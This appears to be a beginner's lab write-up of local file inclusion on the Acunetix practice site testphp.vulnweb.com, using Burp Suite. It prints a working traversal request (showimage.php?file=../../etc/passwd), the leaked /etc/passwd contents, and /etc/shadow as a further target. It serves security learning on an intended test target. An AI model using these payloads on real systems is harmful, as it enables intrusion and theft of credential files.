Identifying Local File Inclusion(LFI) on http://testphp.vulnweb.com/

Hello guys,

This writeup might be helpful for beginners to practice and learn about LFI through http://testphp.vulnweb.com/ lab

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input (source: https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/)

Simply,

LFI = Path Traversal/Directory Traversal + Code Execution

Now, lets begin.

1. Go to http://testphp.vulnweb.com/

2. Have the request captured in your burp suite by reloading the page or from HTTP history tab(Burp version 1.7).

3. Send the request to repeater and click “spider from here”. Add the target to scope. Then click on Burp on top left > Search.

4. Search “file=” and hit on GO

5. Select one request containing “file” parameter and send to repeater.

You can see the value of file parameter as: file=./pictures/4.jpg

An attacker can get the contents of the /etc/passwd file that contains a list of users on the server. So lets replace the value as /etc/passwd

Ok we got a warning in the response. Now lets hit ../etc/passwd . You can observe another warning in the response.

Now again, lets try ../../etc/passwd. Boom!

The response is:

HTTP/1.1 200 OK
Server: nginx/1.19.0
Date: Wed, 07 Jul 2021 06:11:53 GMT
Content-Type: image/jpeg
Connection: close
X-Powered-By: PHP/5.6.40–38+ubuntu20.04.1+deb.sury.org+1
Content-Length: 845

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
nobody:x:65534:1002:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

Our request is:

GET /showimage.php?file=../../etc/passwd HTTP/1.1
Host: testphp.vulnweb.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://testphp.vulnweb.com/listproducts.php?cat=1

Similar parameter values are;

/etc/shadow

/var/logs

Red Team Field Manual.png

Contact

If you want to connect on Facebook→ UJJWAL GAUTAM :)